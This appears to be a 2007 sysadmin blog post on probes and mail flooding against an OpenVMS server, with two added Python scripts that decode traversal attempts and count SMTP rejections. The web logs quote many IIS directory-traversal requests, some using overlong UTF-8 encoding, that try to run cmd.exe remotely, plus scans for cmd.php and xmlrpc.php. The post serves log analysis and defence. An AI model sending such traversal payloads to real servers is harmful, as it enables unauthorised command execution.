One more day of (mail) bombing

In yesterday's post, I mentioned some server trying to deliver something, blocked because its address cannot be translated back to a host name, once every two minutes or so.
Well, it did continue, this being the last entry:

%%%%%%%%%%% OPCOM 19-FEB-2007 22:50:57.98 %%%%%%%%%%%
Message from user INTERnet on DIANA
INTERnet ACP SMTP Accept Request from Host: 84.246.98.2 Port: 4144

%%%%%%%%%%% OPCOM 19-FEB-2007 22:50:58.15 %%%%%%%%%%%
Message from user TCPIP$SMTP on DIANA
%TCPIP-W-SMTP_UNBKTRNSIP, client IP address 84.246.98.2 is not backtranslatable to a host name

OPERATOR.LOG is over 4 times the usual size. I guess 4 times, since Persepone (the personal Alpha on Demeter) was added to the cluster yesterday, over wireless (what Alpha could do that!), and that added some extra lines as well.

Who says Windows is secure….

Though surely just a script and a lot of attempts to hack into a Windows system, this is what I found in last week's webserver log:
222.189.7.29 - - [13/Feb/2007:07:25:54 +0100] "GET /cgi-bin/query/scripts/..%5c%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 815
222.189.7.29 - - [13/Feb/2007:07:25:55 +0100] "GET /cgi-bin/query/scripts/root.exe?/c+dir HTTP/1.0" 404 782
222.189.7.29 - - [13/Feb/2007:07:25:59 +0100] "GET /cgi-bin/query/msadc/..À/..À/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 809
222.189.7.29 - - [13/Feb/2007:07:26:00 +0100] "GET /cgi-bin/query/msadc/..À/../..À/../..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 815
222.189.7.29 - - [13/Feb/2007:07:26:01 +0100] "GET /cgi-bin/query/msadc/..À¯..À¯..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 809
222.189.7.29 - - [13/Feb/2007:07:26:05 +0100] "GET /cgi-bin/query/msadc/..À¯../..À¯../..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 815
222.189.7.29 - - [13/Feb/2007:07:26:06 +0100] "GET /msadc/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:07 +0100] "GET /msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:08 +0100] "GET /msadc/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:08 +0100] "GET /msadc/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:09 +0100] "GET /cgi-bin/query/scripts/..À/..À/..À/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 815
222.189.7.29 - - [13/Feb/2007:07:26:10 +0100] "GET /cgi-bin/query/scripts/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 803
222.189.7.29 - - [13/Feb/2007:07:26:11 +0100] "GET /cgi-bin/query/scripts/..À¯..À¯..À¯..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 815
222.189.7.29 - - [13/Feb/2007:07:26:12 +0100] "GET /cgi-bin/query/scripts/..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 803
222.189.7.29 - - [13/Feb/2007:07:26:13 +0100] "GET /scripts/..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:14 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:17 +0100] "GET /scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:18 +0100] "GET /scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:19 +0100] "GET /cgi-bin/query/scripts/../../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 811
222.189.7.29 - - [13/Feb/2007:07:26:20 +0100] "GET /cgi-bin/query/scripts/../../cmd.exe?/c+dir HTTP/1.0" 404 787
222.189.7.29 - - [13/Feb/2007:07:26:21 +0100] "GET /cgi-bin/query/scripts/../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 802
222.189.7.29 - - [13/Feb/2007:07:26:22 +0100] "GET /cgi-bin/query/scripts/..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 776
222.189.7.29 - - [13/Feb/2007:07:26:23 +0100] "GET /cgi-bin/query/scripts/..?..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 776
222.189.7.29 - - [13/Feb/2007:07:26:24 +0100] "GET /cgi-bin/query/scripts/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 802
222.189.7.29 - - [13/Feb/2007:07:26:24 +0100] "GET /cgi-bin/query/scripts/../../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 811
222.189.7.29 - - [13/Feb/2007:07:26:25 +0100] "GET /cgi-bin/query/scripts/../../cmd.exe?/c+dir HTTP/1.0" 404 787
222.189.7.29 - - [13/Feb/2007:07:26:26 +0100] "GET /cgi-bin/query/scripts/../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 802
222.189.7.29 - - [13/Feb/2007:07:26:27 +0100] "GET /cgi-bin/query/scripts/..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 776
222.189.7.29 - - [13/Feb/2007:07:26:28 +0100] "GET /cgi-bin/query/scripts/..?..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 776
222.189.7.29 - - [13/Feb/2007:07:26:29 +0100] "GET /cgi-bin/query/scripts/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 802
222.189.7.29 - - [13/Feb/2007:07:26:30 +0100] "GET /cgi-bin/query/scripts/cmd.exe?/c+dir HTTP/1.0" 404 781
222.189.7.29 - - [13/Feb/2007:07:26:31 +0100] "GET /scripts/cmd32.exe" 404 675
222.189.7.29 - - [13/Feb/2007:07:26:32 +0100] "GET /cgi-bin/query/scripts/cmd32.exe?/c+dir HTTP/1.0" 404 783
222.189.7.29 - - [13/Feb/2007:07:26:33 +0100] "GET /cgi-bin/query/msadc/..?../..?../..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 774
222.189.7.29 - - [13/Feb/2007:07:26:33 +0100] "GET /cgi-bin/query/msadc/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 774
222.189.7.29 - - [13/Feb/2007:07:26:34 +0100] "GET /cgi-bin/query/msadc/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 800
222.189.7.29 - - [13/Feb/2007:07:26:35 +0100] "GET /cgi-bin/query/script/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 801
222.189.7.29 - - [13/Feb/2007:07:26:36 +0100] "GET /cgi-bin/query/_mem_bin/..À/..À/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 812
222.189.7.29 - - [13/Feb/2007:07:26:37 +0100] "GET /cgi-bin/query/_mem_bin/..À¯..À¯..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 812
222.189.7.29 - - [13/Feb/2007:07:26:38 +0100] "GET /_mem_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:39 +0100] "GET /_mem_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:43 +0100] "GET /cgi-bin/query/_mem_bin/../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 809
222.189.7.29 - - [13/Feb/2007:07:26:43 +0100] "GET /cgi-bin/query/_mem_bin/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 777
222.189.7.29 - - [13/Feb/2007:07:26:44 +0100] "GET /cgi-bin/query/_mem_bin/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 803
222.189.7.29 - - [13/Feb/2007:07:26:45 +0100] "GET /cgi-bin/query/_vti_bin/..À/..À/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 812
222.189.7.29 - - [13/Feb/2007:07:26:49 +0100] "GET /cgi-bin/query/_vti_bin/..À¯..À¯..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 812
222.189.7.29 - - [13/Feb/2007:07:26:50 +0100] "GET /_vti_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:51 +0100] "GET /_vti_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:51 +0100] "GET /cgi-bin/query/_vti_bin/../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 809
222.189.7.29 - - [13/Feb/2007:07:26:52 +0100] "GET /cgi-bin/query/_vti_bin/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 777
222.189.7.29 - - [13/Feb/2007:07:26:53 +0100] "GET /cgi-bin/query/_vti_bin/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 803
222.189.7.29 - - [13/Feb/2007:07:26:54 +0100] "GET /cgi-bin/query/bin/scripts/../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 812
222.189.7.29 - - [13/Feb/2007:07:26:55 +0100] "GET /cgi-bin/query/bin/scripts/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 780
222.189.7.29 - - [13/Feb/2007:07:26:56 +0100] "GET /cgi-bin/query/bin/scripts/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 806
222.189.7.29 - - [13/Feb/2007:07:26:57 +0100] "GET /cgi-bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:26:58 +0100] "GET /cgi-bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:26:58 +0100] "GET /cgi-bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:26:59 +0100] "GET /cgi-bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:27:00 +0100] "GET /cgi-bin/../../../../winnt/system32/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:27:03 +0100] "GET /cgi-bin/..?..?..?../winnt/system32/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:27:04 +0100] "GET /cgi-bin/.._../winnt/system32/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:27:05 +0100] "GET /cgi-Bin/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:27:06 +0100] "GET /cgi-bin/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:27:07 +0100] "GET /Cgi-Bin/cmd32.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:27:07 +0100] "GET /Cgi-Bin/cmd32.exe?/c+dir" 404 675

Clearly someone who's running a script, and I severely doubt his knowledge… Just trying to see if he can get in. Or espionage? The address is said to be located in China:
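To make sense of what that script was throwing at the server, here is an added example (my code, not the blog author's, and nothing the page itself ran) that parses Apache log lines like the ones above, percent-decodes the request, undoes the overlong UTF-8 byte pairs (%c0%af, %c0%2f, %c1%1c, %c1%9c, %c1%9f) that the old IIS traversal probes relied on, and reports for each request whether it reaches for cmd.exe/root.exe and how many ".." steps it climbs above the document root. The sample lines are constructed on the pattern of the post's log, with documentation IP addresses; the mapping of the c0 xx pairs to '/' and the c1 xx pairs to '\' is this example's assumption, taken from how the probe strings are laid out.

```python
"""Decode and classify IIS-era directory-traversal probes in Apache log lines.

Added example, not the blog's own tooling. Input is the Apache common/combined
log format; the log is assumed to have been read with encoding="latin-1" so
that raw attacker bytes such as c0 af survive as the characters "À¯", exactly
as they appear in the post.
"""
import re
from urllib.parse import unquote_to_bytes

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: (?P<proto>[^"]+))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Overlong / invalid UTF-8 byte pairs used by the old IIS "unicode" traversal
# probes. Assumption in this example: the c0 xx forms stand for '/' and the
# c1 xx forms for '\', which is how the probe strings are laid out
# ("..%c0%af.." vs "..%c1%1c.."). Only the pairs seen in the post are listed.
OVERLONG = {
    b"\xc0\xaf": b"/",
    b"\xc0\x2f": b"/",
    b"\xc1\x1c": b"\\",
    b"\xc1\x9c": b"\\",
    b"\xc1\x9f": b"\\",
}
TARGET_RE = re.compile(r"(?:cmd|cmd32|root)\.exe", re.IGNORECASE)


def analyse(line: str):
    """Return a dict describing one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Latin-1 round-trip gives back the raw bytes; then undo the %xx encoding.
    raw = unquote_to_bytes(m["target"].encode("latin-1", "replace"))
    techniques = set()
    if b"\\" in raw:                      # %5c or a literal backslash
        techniques.add("backslash")
    for seq, rep in OVERLONG.items():
        if seq in raw:
            techniques.add("overlong-utf8")
            raw = raw.replace(seq, rep)
    text = raw.replace(b"\\", b"/").decode("ascii", "replace")

    hit = TARGET_RE.search(text)
    # Walk the path up to the target and count how often ".." climbs above
    # the document root; anything > 0 is an attempt to leave the web tree.
    before = text[: hit.start()] if hit else text.split("?", 1)[0]
    depth = escapes = 0
    for seg in before.split("/"):
        if seg == "..":
            if depth:
                depth -= 1
            else:
                escapes += 1
        elif seg not in ("", "."):
            depth += 1
    return {
        "ip": m["ip"],
        "status": int(m["status"]),
        "decoded": text,
        "target": hit.group(0).lower() if hit else None,
        "escapes": escapes,
        "techniques": sorted(techniques),
    }


def probes(lines):
    """Only the lines that reach for cmd.exe / cmd32.exe / root.exe."""
    return [a for a in map(analyse, lines) if a and a["target"]]


def by_source(lines):
    """Group probe lines per client IP."""
    out = {}
    for p in probes(lines):
        out.setdefault(p["ip"], []).append(p)
    return out


# Constructed sample, modelled on the post's log (documentation IPs).
# The fourth line carries the raw c0 af bytes as Latin-1 text ("À¯").
SAMPLE_LOG = [
    '203.0.113.7 - - [13/Feb/2007:07:25:54 +0100] "GET /scripts/..%5c%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 815',
    '203.0.113.7 - - [13/Feb/2007:07:26:06 +0100] "GET /msadc/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir" 403 671',
    '203.0.113.7 - - [13/Feb/2007:07:26:58 +0100] "GET /cgi-bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir" 404 675',
    '203.0.113.7 - - [13/Feb/2007:07:26:37 +0100] "GET /cgi-bin/query/_mem_bin/..\xc0\xaf..\xc0\xaf..\xc0\xaf../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 812',
    '203.0.113.7 - - [13/Feb/2007:07:27:06 +0100] "GET /cgi-bin/cmd.exe?/c+dir" 404 675',
    '198.51.100.9 - - [13/Feb/2007:08:00:00 +0100] "GET /index.html HTTP/1.1" 200 1234',
]

if __name__ == "__main__":
    for ip, hits in by_source(SAMPLE_LOG).items():
        print(ip, len(hits), "probes")
        for p in hits:
            print(f'  {p["status"]} escapes={p["escapes"]} {p["techniques"]} {p["decoded"]}')
```

Every one of the requests in the post got a 403 or 404, so here the only lesson is the catalogue of encodings. On a server where this mattered, the line to search for is the same request answered with 200: the `/c+dir` argument means a hit would have come back with a directory listing in the response body.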

inetnum: 222.184.0.0 - 222.191.255.255
netname: CHINANET-JS
descr: CHINANET jiangsu province network
descr: China Telecom
descr: A12,Xin-Jie-Kou-Wai Street
descr: Beijing 100088
country: CN
admin-c: CH93-AP
tech-c: CJ186-AP
mnt-by: APNIC-HM
mnt-lower: MAINT-CHINANET-JS
mnt-routes: MAINT-CHINANET-JS

Apart from this, just a few that appear quite regularly:

69.84.207.37 - - [12/Feb/2007:07:02:35 +0100] "GET /No%0Ate-email.htm HTTP/1.1" 403 864
69.84.207.37 - - [12/Feb/2007:07:06:27 +0100] "GET /cgi-bin/count.exe HTTP/1.1" 502 900
69.84.207.37 - - [12/Feb/2007:07:06:28 +0100] "GET /cgi-bin/c%0Aount.exe HTTP/1.1" 404 887
207.234.131.90 - - [12/Feb/2007:09:56:37 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 893

These are just a few of them; not a lot in a week.
Mail
Someone is trying to blow up the SMTP server, for over 24 hours now:
%%%%%%%%%%% OPCOM 18-FEB-2007 14:46:13.71 %%%%%%%%%%%
Message from user INTERnet on DIANA
INTERnet ACP SMTP Accept Request from Host: 84.246.98.2 Port: 4977

%%%%%%%%%%% OPCOM 18-FEB-2007 14:46:13.92 %%%%%%%%%%%
Message from user TCPIP$SMTP on DIANA
%TCPIP-W-SMTP_UNBKTRNSIP, client IP address 84.246.98.2 is not backtranslatable
...
%%%%%%%%%%% OPCOM 19-FEB-2007 22:50:57.98 %%%%%%%%%%%
Message from user INTERnet on DIANA
INTERnet ACP SMTP Accept Request from Host: 84.246.98.2 Port: 4144

%%%%%%%%%%% OPCOM 19-FEB-2007 22:50:58.15 %%%%%%%%%%%
Message from user TCPIP$SMTP on DIANA
%TCPIP-W-SMTP_UNBKTRNSIP, client IP address 84.246.98.2 is not backtranslatable to a host name

I haven't counted the entries, but the attempts occur every 2 minutes or so. Alas, the router has no ability to block him there…
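As an added example (not part of the post, and not something the page's OpenVMS box ran), here is a script that turns those OPCOM records into the count the post skipped: it takes every %TCPIP-W-SMTP_UNBKTRNSIP warning with its timestamp, groups them per client address and reports the number of attempts and the median gap between them. The records below are constructed in the format shown on this page, with documentation addresses instead of the real one.

```python
"""Count and time the SMTP_UNBKTRNSIP rejections per client in an OPCOM log.

Added example, not the blog's own tooling. It reads OPERATOR.LOG records in
the form shown in the post and reports, per client IP, how many times the SMTP
server refused it and the typical gap between attempts.
"""
import re
import statistics
from datetime import datetime

HEADER_RE = re.compile(
    r"^%+ OPCOM (\d{2}-[A-Z]{3}-\d{4} \d{2}:\d{2}:\d{2}\.\d{2}) %+$", re.MULTILINE
)
UNBK_RE = re.compile(
    r"SMTP_UNBKTRNSIP, client IP address (\S+) is not backtranslatable"
)


def parse_records(text):
    """Yield (timestamp, body) per OPCOM record; body is the text after the header line."""
    parts = HEADER_RE.split(text)          # [prefix, ts1, body1, ts2, body2, ...]
    for stamp, body in zip(parts[1::2], parts[2::2]):
        yield datetime.strptime(stamp, "%d-%b-%Y %H:%M:%S.%f"), body


def rejected_clients(text):
    """Map client IP -> sorted timestamps of its SMTP_UNBKTRNSIP rejections."""
    seen = {}
    for stamp, body in parse_records(text):
        m = UNBK_RE.search(body)
        if m:
            seen.setdefault(m.group(1), []).append(stamp)
    return {ip: sorted(stamps) for ip, stamps in seen.items()}


def summarize(text):
    """Per client: attempt count, first/last seen and the median gap in seconds."""
    report = {}
    for ip, stamps in rejected_clients(text).items():
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        report[ip] = {
            "attempts": len(stamps),
            "first": stamps[0],
            "last": stamps[-1],
            "median_gap_s": statistics.median(gaps) if gaps else None,
        }
    return report


# Constructed sample in the page's OPCOM format (documentation IPs, not the
# address from the post). The Accept Request record carries no warning and
# is skipped; the three warnings for .23 are two minutes apart.
SAMPLE_OPCOM = """\
%%%%%%%%%%% OPCOM 18-FEB-2007 14:46:13.71 %%%%%%%%%%%
Message from user INTERnet on DIANA
INTERnet ACP SMTP Accept Request from Host: 198.51.100.23 Port: 4977

%%%%%%%%%%% OPCOM 18-FEB-2007 14:46:13.92 %%%%%%%%%%%
Message from user TCPIP$SMTP on DIANA
%TCPIP-W-SMTP_UNBKTRNSIP, client IP address 198.51.100.23 is not backtranslatable to a host name

%%%%%%%%%%% OPCOM 18-FEB-2007 14:48:14.05 %%%%%%%%%%%
Message from user TCPIP$SMTP on DIANA
%TCPIP-W-SMTP_UNBKTRNSIP, client IP address 198.51.100.23 is not backtranslatable to a host name

%%%%%%%%%%% OPCOM 18-FEB-2007 14:50:13.88 %%%%%%%%%%%
Message from user TCPIP$SMTP on DIANA
%TCPIP-W-SMTP_UNBKTRNSIP, client IP address 198.51.100.23 is not backtranslatable to a host name

%%%%%%%%%%% OPCOM 18-FEB-2007 15:02:00.10 %%%%%%%%%%%
Message from user TCPIP$SMTP on DIANA
%TCPIP-W-SMTP_UNBKTRNSIP, client IP address 203.0.113.5 is not backtranslatable to a host name
"""

if __name__ == "__main__":
    for ip, info in summarize(SAMPLE_OPCOM).items():
        print(ip, info["attempts"], "attempts,",
              info["first"], "..", info["last"],
              "median gap", info["median_gap_s"], "s")
```

A steady two-minute cadence over more than a day is automation, not a person; the median gap makes that visible at a glance, and the per-address count with first and last seen is what an abuse desk asks for. The page's router cannot filter on the address; as I recall, TCP/IP Services can refuse the client at the service level with `TCPIP SET SERVICE SMTP /REJECT=HOSTS=(...)`, but check `HELP TCPIP SET SERVICE` on your own version before relying on that from memory.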
This address is a UK one:
inetnum: 84.246.96.0 - 84.246.103.255
netname: UK-WH-UK-20040830
descr: World Hub Limited
descr: PROVIDER Local Registry
country: GB # US
org: ORG-WHL1-RIPE
admin-c: DA1277-RIPE
tech-c: DA1277-RIPE
status: ALLOCATED PA
mnt-by: RIPE-NCC-HM-MNT
mnt-lower: worldhub-ip
mnt-routes: worldhub-ip
source: RIPE # Filtered

Both ISPs will be informed.

Some keep trying

Just one tried to get into the anonymous area yesterday; this is what OPERATOR.LOG tells:
%%%%%%%%%%% OPCOM 13-FEB-2007 04:15:37.63 %%%%%%%%%%%
Message from user TCPIP$FTP on DIANA
User Name: anonymous
Source: p548C9062.dip0.t-ipconnect.de
Status: NOPRIV -- File access violation
Object: WEB_DISK2:[public.anonymous.070213041515p]


It has been a long time since I saw these messages. Checking the logging of anonymous FTP, there have been some attempts, but it's all very, very quiet here. However, for some reason the logfiles do not show up on the operator desk, so that's something to look into.
The oldest, after the link from the main page was removed, goes back to 13-Nov-2006, and once in a while, once or twice a month, someone comes along to try to host some files. But the area is set to be read-only, so that is bound to fail. Since most don't have a clue what they're doing, they try to access "standard" files. That is: standard for Linux or Windows, or some packages.

13-FEB-2007 04:15:36.20 User:anonymous logged in ident:Agpuser@home.com from Host:p548C9062.dip0.t-ipconnect.de
13-FEB-2007 04:15:37.54 User:anonymous ident:Agpuser@home.com status:00010001 CWD dir:WEB_DISK2:[public.anonymous]
13-FEB-2007 04:15:39.24 User:anonymous ident:Agpuser@home.com status:07649912 CWD dir:SYS$POSIX_ROOT^:^[000000^]tagged
13-FEB-2007 04:15:39.32 User:anonymous ident:Agpuser@home.com status:07649912 CWD dir:SYS$POSIX_ROOT^:^[000000^]Tagged
13-FEB-2007 04:15:39.40 User:anonymous ident:Agpuser@home.com status:07649912 CWD dir:SYS$POSIX_ROOT^:^[000000^]TaGGeD
13-FEB-2007 04:15:39.48 User:anonymous ident:Agpuser@home.com status:07649912 CWD dir:SYS$POSIX_ROOT^:^[000000^]data
13-FEB-2007 04:15:39.57 User:anonymous ident:Agpuser@home.com status:07649912 CWD dir:SYS$POSIX_ROOT^:^[000000^]Data
13-FEB-2007 04:15:39.65 User:anonymous ident:Agpuser@home.com status:07649912 CWD dir:SYS$POSIX_ROOT^:^[000000^]^%
13-FEB-2007 04:15:39.74 User:anonymous ident:Agpuser@home.com status:07649912 CWD dir:SYS$SCRATCH^:
13-FEB-2007 04:15:39.82 User:anonymous ident:Agpuser@home.com status:07649912 CWD dir:SYS$POSIX_ROOT^:^[000000^]T^^^@gged
13-FEB-2007 04:15:39.90 User:anonymous ident:Agpuser@home.com logged out

The same is observed on web access, at times. The latest proof, from last week's log:

219.122.14.36 - - [07/Feb/2007:19:16:28 +0100] "GET /thisdoesnotexistahaha.php HTTP/1.1" 302 360
219.122.14.36 - - [07/Feb/2007:19:16:28 +0100] "GET /cmd.php HTTP/1.1" 302 360
219.122.14.36 - - [07/Feb/2007:19:16:29 +0100] "GET /cacti/cmd.php HTTP/1.1" 302 360
219.122.14.36 - - [07/Feb/2007:19:16:30 +0100] "GET /portal/cacti/cmd.php HTTP/1.1" 302 360
219.122.14.36 - - [07/Feb/2007:19:16:30 +0100] "GET /portal/cmd.php HTTP/1.1" 302 360
219.122.14.36 - - [07/Feb/2007:19:16:31 +0100] "GET /stats/cmd.php HTTP/1.1" 302 360

but some will drop their attempt directly:
213.247.43.35 - - [11/Feb/2007:07:25:24 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 893

A few try it (again) over the web

In the last webserver log, there were two similar attempts:

213.186.50.160 - - [15/Jan/2007:17:59:49 +0100] "GET /a1b2c3d4e5f6g7h8i9/nonexistentfile.php HTTP/1.0" 404 864
213.186.50.160 - - [15/Jan/2007:17:59:49 +0100] "GET /adxmlrpc.php HTTP/1.0" 404 864
213.186.50.160 - - [15/Jan/2007:17:59:49 +0100] "GET /adserver/adxmlrpc.php HTTP/1.0" 404 864
213.186.50.160 - - [15/Jan/2007:17:59:49 +0100] "GET /phpAdsNew/adxmlrpc.php HTTP/1.0" 404 864
213.186.50.160 - - [15/Jan/2007:17:59:49 +0100] "GET /phpadsnew/adxmlrpc.php HTTP/1.0" 404 864
213.186.50.160 - - [15/Jan/2007:17:59:49 +0100] "GET /phpads/adxmlrpc.php HTTP/1.0" 404 864
213.186.50.160 - - [15/Jan/2007:17:59:49 +0100] "GET /Ads/adxmlrpc.php HTTP/1.0" 404 864
213.186.50.160 - - [15/Jan/2007:17:59:49 +0100] "GET /ads/adxmlrpc.php HTTP/1.0" 404 864
213.186.50.160 - - [15/Jan/2007:17:59:49 +0100] "GET /xmlrpc.php HTTP/1.0" 404 864
213.186.50.160 - - [15/Jan/2007:17:59:49 +0100] "GET /xmlrpc/xmlrpc.php HTTP/1.0" 404 864
213.186.50.160 - - [15/Jan/2007:17:59:49 +0100] "GET /xmlsrv/xmlrpc.php HTTP/1.0" 404 864
213.186.50.160 - - [15/Jan/2007:17:59:49 +0100] "GET /blog/xmlrpc.php HTTP/1.0" 404 864
213.186.50.160 - - [15/Jan/2007:17:59:50 +0100] "GET /drupal/xmlrpc.php HTTP/1.0" 404 864
213.186.50.160 - - [15/Jan/2007:17:59:50 +0100] "GET /community/xmlrpc.php HTTP/1.0" 404 864
213.186.50.160 - - [15/Jan/2007:17:59:50 +0100] "GET /blogs/xmlrpc.php HTTP/1.0" 404 864
213.186.50.160 - - [15/Jan/2007:17:59:50 +0100] "GET /blogs/xmlsrv/xmlrpc.php HTTP/1.0" 404 864
213.186.50.160 - - [15/Jan/2007:17:59:50 +0100] "GET /blog/xmlsrv/xmlrpc.php HTTP/1.0" 404 864
213.186.50.160 - - [15/Jan/2007:17:59:50 +0100] "GET /blogtest/xmlsrv/xmlrpc.php HTTP/1.0" 404 864
213.186.50.160 - - [15/Jan/2007:17:59:50 +0100] "GET /b2/xmlsrv/xmlrpc.php HTTP/1.0" 404 864
213.186.50.160 - - [15/Jan/2007:17:59:50 +0100] "GET /b2evo/xmlsrv/xmlrpc.php HTTP/1.0" 404 864
213.186.50.160 - - [15/Jan/2007:17:59:50 +0100] "GET /wordpress/xmlrpc.php HTTP/1.0" 404 864
213.186.50.160 - - [15/Jan/2007:17:59:50 +0100] "GET /phpgroupware/xmlrpc.php HTTP/1.0" 404 864

Checking this address, it seems to originate from France:

inetnum: 213.186.50.128 - 213.186.50.191
netname: BEWEST
descr: BEWEST
country: FR
admin-c: OK217-RIPE
tech-c: OK217-RIPE
status: ASSIGNED PA
mnt-by: OVH-MNT
source: RIPE # Filtered

...
% Information related to '213.186.32.0/19AS16276'

route: 213.186.32.0/19
descr: OVH ISP
descr: Paris, France
origin: AS16276
mnt-by: OVH-MNT
source: RIPE # Filtered

A few days later, there was another one:

211.174.62.251 - - [18/Jan/2007:12:51:14 +0100] "GET /x0x0x0x0x0x0x0x0x0/ThisFileMustNotExist HTTP/1.0" 404 868
211.174.62.251 - - [18/Jan/2007:12:51:15 +0100] "GET /xmlrpc.php HTTP/1.0" 404 868
211.174.62.251 - - [18/Jan/2007:12:51:15 +0100] "GET /xmlrpc/xmlrpc.php HTTP/1.0" 404 868
211.174.62.251 - - [18/Jan/2007:12:51:16 +0100] "GET /xmlsrv/xmlrpc.php HTTP/1.0" 404 868
211.174.62.251 - - [18/Jan/2007:12:51:17 +0100] "GET /blog/xmlrpc.php HTTP/1.0" 404 868
211.174.62.251 - - [18/Jan/2007:12:51:17 +0100] "GET /drupal/xmlrpc.php HTTP/1.0" 404 868
211.174.62.251 - - [18/Jan/2007:12:51:18 +0100] "GET /community/xmlrpc.php HTTP/1.0" 404 868
211.174.62.251 - - [18/Jan/2007:12:51:18 +0100] "GET /blogs/xmlrpc.php HTTP/1.0" 404 868
211.174.62.251 - - [18/Jan/2007:12:51:19 +0100] "GET /blogs/xmlsrv/xmlrpc.php HTTP/1.0" 404 868
211.174.62.251 - - [18/Jan/2007:12:51:20 +0100] "GET /blog/xmlsrv/xmlrpc.php HTTP/1.0" 404 868
